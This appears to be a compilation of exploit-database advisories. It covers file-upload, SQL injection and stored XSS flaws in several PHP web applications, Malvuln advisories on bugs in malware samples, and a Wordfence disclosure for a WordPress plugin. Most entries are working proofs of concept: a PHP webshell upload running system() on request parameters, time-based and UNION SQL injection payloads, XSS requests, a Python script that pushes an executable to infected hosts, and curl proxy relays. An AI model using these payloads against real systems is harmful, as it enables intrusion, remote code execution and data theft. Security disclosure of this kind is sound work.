<pre><code># Exploit Title: Landa Driving School Management System Arbitrary File Upload<br /># Version 2.0.1<br /># Google Dork: N/A<br /># Date: 17/01/2022<br /># Exploit Author: Sohel Yousef - sohel.yousef@yandex.com<br /># Software Link: https://codecanyon.net/item/landa-driving-school-management-system/23220151<br /># Software link 2 :https://simcycreative.com/landa/<br /># Software Demo : https://landa.simcycreative.com/<br /># Category: webapps<br /><br />Landa Driving School Management System contain arbitrary file upload<br />registered user can upload .php5 files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br />details <br /><br />POST /profile/attachment/upload/ HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: ar,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------215084716322124620333137564048<br />Content-Length: 294983<br />Origin: https://localhost <br />Connection: close<br />Referer: https://localhost/profile/91/<br />Cookie: CSRF-TOKEN=e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf; simcify=97a4436a6f7c5c5cd1fc43b903e3b760<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="name"<br /><br />sddd<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="csrf-token"<br /><br />e9055e0cf3dbcbf383f7fdf46d418840fd395995ced9f3e1756bd9101edf0fcf<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="userid"<br /><br />91<br />-----------------------------215084716322124620333137564048<br />Content-Disposition: form-data; name="attachment"; filename="w.php.png" >>>>>>>>>>>>>>>> change this to w.php5<br />Content-Type: image/png<br /><br /><br />you will have a direct link to the uploaded files <br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/ee8990b5d076a7ed601a30eb677cc9be.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Email-Worm.Win32.Plexus.b<br />Vulnerability: Unauthenticated Remote Code Execution<br />Description: The malware listens on TCP ports 1250 (file write port) and 47435 (random FTP port). Third-party attackers who can reach infected systems can use a socket program to write binary data to the remote host. The malware then writes that data to a file named "_up.exe" under "\Users\Victim\AppData\Local\Temp" that executes immediately.<br /><br />Exploitation requires a few things for our code to run successfully, as there seems to be a file size limitation and header issues.<br /><br />1) Create a very small executable using masm32 in assembly.<br />2) Pack it using fsg13<br />3) Prefix our payload with a DOS "MZ" header and "ETX" control char in hex "\x03" followed by two NULL bytes, as it doesn't write the MZ header correctly.<br />4) Use python to read in our EXE payload and push to the infected host.<br /><br />Type: PE32<br />MD5: ee8990b5d076a7ed601a30eb677cc9be<br />Vuln ID: MVID-2021-0400<br />Disclosure: 11/07/2021<br /><br /><br />Exploit/PoC:<br />1) "DOOM.asm" compiled with masm32.<br /><br />include \masm32\include\masm32rt.inc<br />.data<br />HATE db "Masm32:", 0<br />MyReal8 REAL8 123.456<br />.data?<br />aDword dd ?<br />.code<br />start:<br /> invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK<br /> mov eax, 123<br /> exit<br />end start<br /><br /><br />2) Pack DOOM.exe using FSG13.<br /><br /><br />3) Connect to the infected system and push our own PE file.<br /><br /># -*- coding: utf-8 -*-<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=1250<br />DOOM="DOOM_FSG.exe"<br />EXE="MZ\x00\x03\x00\x00"<br /><br />def doit():<br /> global EXE<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = EXE + f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("MD5: ee8990b5d076a7ed601a30eb677cc9be")<br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)<br /># Date: 18/01/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Exploit : <br /> <br />You can upload a php shell file as a bot_avatar or user_avatar or image<br /><br /># ------------------------------------------------------------------------------------------<br /># POC<br /># ------------------------------------------------------------------------------------------<br /><br /># Request sent as base user<br /><br />POST /classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost.SA<br />Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474<br />Content-Length: 1121<br />Connection: close<br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="name"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="short_name"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="intro"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="no_result"<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: image/jpeg<br /><br /><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />if($_REQUEST['s']) {<br /> system($_REQUEST['s']);<br /> } else phpinfo();<br />?><br /></pre><br /></body><br /></html><br />-----------------------------55217074722533208072616276474<br />Content-Disposition: form-data; name="user_avatar"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------55217074722533208072616276474--<br /><br /><br /># Response<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 18 Jan 2022 00:51:29 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12<br />X-Powered-By: PHP/8.0.12<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 119<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />1<br /><br /># ------------------------------------------------------------------------------------------<br /># Request to webshell<br /># ------------------------------------------------------------------------------------------<br /><br />GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1<br />Host: localhost.SA<br />Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0<br />Connection: close<br /><br /># ------------------------------------------------------------------------------------------<br /># Webshell response<br /># ------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Date: Tue, 18 Jan 2022 00:51:29 GMT<br />Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12<br />X-Powered-By: PHP/8.0.12<br />Content-Length: 16<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><pre>0xSaudi<br /></pre><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/e2d249f86890d290bb8af599ea0367f3.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.SkynetRef.y<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 3128. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: e2d249f86890d290bb8af599ea0367f3<br />Vuln ID: MVID-2021-0399<br />Dropped files: wusa32.exe<br />Disclosure: 11/07/2021<br /><br />Exploit/PoC:<br />curl socks4://INFECTED_HOST:3128 http://VICTIM:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi<br /># Date: 18/01/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /># Steps<br /># Go to : http://127.0.0.1/classes/Master.php?f=get_response<br /># Save request in BurpSuite<br /># Run saved request with sqlmap -r sql.txt<br /><br />======<br /><br />POST /classes/Master.php?f=get_response HTTP/1.1<br />Host: 127.0.0.1<br />Content-Type: application/x-www-form-urlencoded<br />X-Requested-With: XMLHttpRequest<br />Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate<br />Content-Length: 73<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36<br />Connection: Keep-alive<br /><br />message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud<br /><br />======<br /><br />#Payloads<br /><br />#Payload (UNION query)<br />message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- -<br /><br />#(AND/OR time-based blind)<br />message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/339ec4617eababfd46006f2219e68cb8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.SkynetRef.x<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 3128. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: 339ec4617eababfd46006f2219e68cb8<br />Vuln ID: MVID-2021-0398<br />Dropped files: wusa32.exe<br />Disclosure: 11/07/2021<br /><br />Exploit/PoC:<br />curl socks4://INFECTED_HOST:3128 http://VICTIM:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Nyron 1.0 - SQLi (Unauthenticated)<br /># Google Dork: inurl:"winlib.aspx"<br /># Date: 01/18/2021<br /># Exploit Author: Miguel Santareno<br /># Vendor Homepage: http://www.wecul.pt/<br /># Software Link: http://www.wecul.pt/solucoes/bibliotecas/<br /># Version: < 1.0<br /># Tested on: windows<br /><br /># 1. Description<br /><br />Unauthenticated user can exploit SQL Injection vulnerability in thes1 parameter.<br /><br /><br /># 2. Proof of Concept (PoC)<br /><br />https://vulnerable_webiste.com/Nyron/Library/Catalog/winlibsrch.aspx?skey=C8AF11631DCA40ADA6DE4C2E323B9989&pag=1&tpp=12&sort=4&cap=&pesq=5&thes1='"><br /><br /><br /># 3. Research:<br />https://miguelsantareno.github.io/edp.pdf<br /></code></pre>
<pre><code># Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)<br /># Exploit Author: Sentinal920<br /># Date: 5-11-2021 <br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip<br /># Version: 1.0<br /># Tested on: Kali Linux<br /># Vulnerable page: client,invoice<br /># Vulnerable Parameters: "lastname", "remarks"<br /><br />Technical description:<br />A stored XSS vulnerability exists in the Simple Client Management<br />System. An attacker can leverage this vulnerability in order to run<br />javascript on the web server surfers behalf, which can lead to cookie<br />stealing, defacement and more.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/cms/admin/?page=client<br />2) Click on add new client<br />3) Insert your payload in the "lastname" parameter or the "description" parameter<br />4) Click save<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br /><script>alert(1)</script><br /><br /><br /><br />1) XSS POC in Add New Client<br />-----------------------------<br /><br />POST /cms/classes/Master.php?f=save_client HTTP/1.1<br />Host: localhost<br />Content-Length: 1026<br />sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82<br />Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=client/manage_client<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn<br />Connection: close<br /><br /><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="lastname"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="firstname"<br /><br />anything<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="middlename"<br /><br />anything<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="gender"<br /><br />Male<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="dob"<br /><br />2021-11-03<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="contact"<br /><br />xxxxxxxxxx<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="address"<br /><br />xxxxxx<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="email"<br />xxxx@xxx.com<br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt<br />Content-Disposition: form-data; name="avatar"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--<br /><br /><br /><br />2) XSS POC in Add New Invoice<br />-----------------------------<br /><br />POST /cms/classes/Master.php?f=save_invoice HTTP/1.1<br />Host: localhost<br />Content-Length: 1032<br />sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82<br />Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=invoice/manage_invoice<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn<br />Connection: close<br /><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="id"<br /><br /><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="client_id"<br /><br />1<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="service_id[]"<br /><br />1<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="price[]"<br /><br />250<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="discount_perc"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="discount"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="tax_perc"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="tax"<br /><br />0<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="total_amount"<br /><br />250<br />------WebKitFormBoundaryEk0iOWhhoA0lApXo<br />Content-Disposition: form-data; name="remarks"<br /><br /><script>alert(1)</script><br />------WebKitFormBoundaryEk0iOWhhoA0lApXo--<br /></code></pre>
<pre><code>Exploit makes it possible for unauthenticated attackers to achieve complete site takeover.<br /><br />On December 23, 2021 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “WordPress Email Template Designer – WP HTML Mail”, a WordPress plugin that is installed on over 20,000 sites. This flaw made it possible for an unauthenticated attacker to inject malicious JavaScript that would execute whenever a site administrator accessed the template editor. This vulnerability would also allow them to modify the email template to contain arbitrary data that could be used to perform a phishing attack against anyone who received emails from the compromised site.<br /><br />We sent the full disclosure details to the developer on January 10, 2022, after multiple attempts to contact the developer and eventually receiving a response. The developer quickly acknowledged the report and released a patch on January 13, 2022.<br /><br />We strongly recommend ensuring that your site has been updated to the latest patched version of “WordPress Email Template Designer – WP HTML Mail”, which is version 3.1 at the time of this publication.<br /><br />This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. (https://email.wordfence.com/e3t/Btc/GC+113/cwG7R04/VWHDpL75Z3_XW4BV8g54nSzDBW7RdXLG4DvH44N31NNzS5js6pV3Zsc37CgClmW2MbXKP1qGwNjW4jBH7-6ZVxShW6Lvyzw7xS90wW7Pj_kV20YJL6W9gr1v15wqdHCW62mCFw6CgLmDN37XHLx8BCshW41WbRV7-4L_gW3bxWBV25mHz1W3KMc066ZhQSYW1LvgN42411V8W55h1_H6hxhTxW2bRqLF47PRK_W5lgzmq1MSksKVvWl-B5Q4pBNW359SM860B8RxN1n59qWGtQttW2DlkJ64tZCVvV9BvD_2ylV4mW71kLBZ47rgbnW58XHc-5jBt2sW26BWFT1cCD6xW7vlbvr7t7-F3N5_TslrJMNvZW71ydcY6NmCzRW4pzKQ52TkMLXW15LPKz1KqSqqW8B3YpV8wxdBQW1b_h1b69r2gHW6D8PdB3GLMMfW6s3jhD5HPY5XW1xR0fr79Sb6B31Mp1 ) Or you can read the full post in this email.<br /><br />Description: Unprotected REST-API Endpoint to Unauthenticated Stored Cross-Site Scripting and Data Modification<br /><br />Affected Plugin: WordPress Email Template Designer – WP HTML Mail<br /><br />Plugin Slug: wp-html-mail<br /><br />Plugin Developer: codemiq<br /><br />Affected Versions: <= 3.0.9<br /><br />CVE ID: CVE-2022-0218<br /><br />CVSS Score: 8.3 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 3.1<br /><br />WP HTML Mail is a WordPress plugin developed to make designing custom emails simpler for WordPress site owners. It is compatible with various WordPress plugins like WooCommerce, Ninja Forms, BuddyPress, and more. The plugin registers two REST-API routes which are used to retrieve email template settings and update email template settings. Unfortunately, these were insecurely implemented making it possible for unauthenticated users to access these endpoints.<br /><br />More specifically, the plugin registers the /themesettings endpoint, which calls the saveThemeSettings function or the getThemeSettings function depending on the request method. The REST-API endpoint did use the permission_callback function, however, it was set to __return_true which meant that no authentication was required to execute the functions. Therefore, any user had access to execute the REST-API endpoint to save the email’s theme settings or retrieve the email's theme settings.<br /><br />[Please read the full article here (https://email.wordfence.com/e3t/Btc/GC+113/cwG7R04/VWHDpL75Z3_XW4BV8g54nSzDBW7RdXLG4DvH44N31NNzS5js6pV3Zsc37CgClmW2MbXKP1qGwNjW4jBH7-6ZVxShW6Lvyzw7xS90wW7Pj_kV20YJL6W9gr1v15wqdHCW62mCFw6CgLmDN37XHLx8BCshW41WbRV7-4L_gW3bxWBV25mHz1W3KMc066ZhQSYW1LvgN42411V8W55h1_H6hxhTxW2bRqLF47PRK_W5lgzmq1MSksKVvWl-B5Q4pBNW359SM860B8RxN1n59qWGtQttW2DlkJ64tZCVvV9BvD_2ylV4mW71kLBZ47rgbnW58XHc-5jBt2sW26BWFT1cCD6xW7vlbvr7t7-F3N5_TslrJMNvZW71ydcY6NmCzRW4pzKQ52TkMLXW15LPKz1KqSqqW8B3YpV8wxdBQW1b_h1b69r2gHW6D8PdB3GLMMfW6s3jhD5HPY5XW1xR0fr79Sb6B31Mp1 ) to view this code snippet.]<br /><br />As this functionality was designed to implement setting changes for the email template, an unauthenticated user could easily make changes to the email template that could aid in phishing attempts against users that receive emails from the targeted site. Worse yet, unauthenticated attackers could inject malicious JavaScript into the mail template that would execute anytime a site administrator accessed the HTML mail editor.<br /><br />As always, cross-site scripting vulnerabilities can be used to inject code that can add new administrative users, redirect victims to malicious sites, inject backdoors into theme and plugin files, and so much more. Combined with the fact that the vulnerability can be exploited by attackers with no privileges on a vulnerable site, this means that there is a high chance that unauthenticated attackers could gain administrative user access on sites running the vulnerable version of the plugin when successfully exploited. As such, we strongly recommend that you verify that your site is running the most up to date version of the plugin immediately.<br /><br />Timeline<br /><br />December 23, 2021 – Conclusion of the plugin analysis that led to the discovery of a Stored Cross-Site Scripting Vulnerability in the “WordPress Email Template Designer – WP HTML Mail” plugin. We develop and release a firewall rule to protect Wordfence users. Wordfence Premium users receive this rule immediately. We attempt to initiate contact with the developer.<br /><br />January 4, 2022 – We send an additional outreach attempt to the developer.<br /><br />January 10, 2022 – The developer confirms the inbox for handling the discussion. We send over the full disclosure details.<br /><br />January 11, 2022 – The developer acknowledges the report and indicates that they will work on a fix.<br /><br />January 13, 2022 – A fully patched version of the plugin is released as version 3.1.<br /><br />January 22, 2022 – The firewall rule becomes available to free Wordfence users.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “WordPress Email Template Designer – WP HTML Mail” plugin that made it possible for unauthenticated attackers to inject malicious web scripts that would execute whenever a site owner accessed the mail editor area plugin, which could lead to complete site compromise. This flaw has been fully patched in version 3.1.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 3.1 at the time of this publication.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/7588da376f496aa678cdfca4e404f38a.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Servstar.poa<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Third party attackers who can place an arbitrary executable under c:\ drive can potentially undermine the integrity of the malware by having it run theirs instead with SYSTEM privs.<br />Type: PE32<br />MD5: 7588da376f496aa678cdfca4e404f38a<br />Vuln ID: MVID-2021-0397<br />Dropped files: Random named e.g. waqqoo.exe, iigkie.exe<br />Disclosure: 11/07/2021<br /><br /><br />Exploit/PoC:<br />C:\>sc qc MSUpdqtewux<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MSUpdqtewux<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\iigkie.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Microsoft Windows Uqdateouq Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>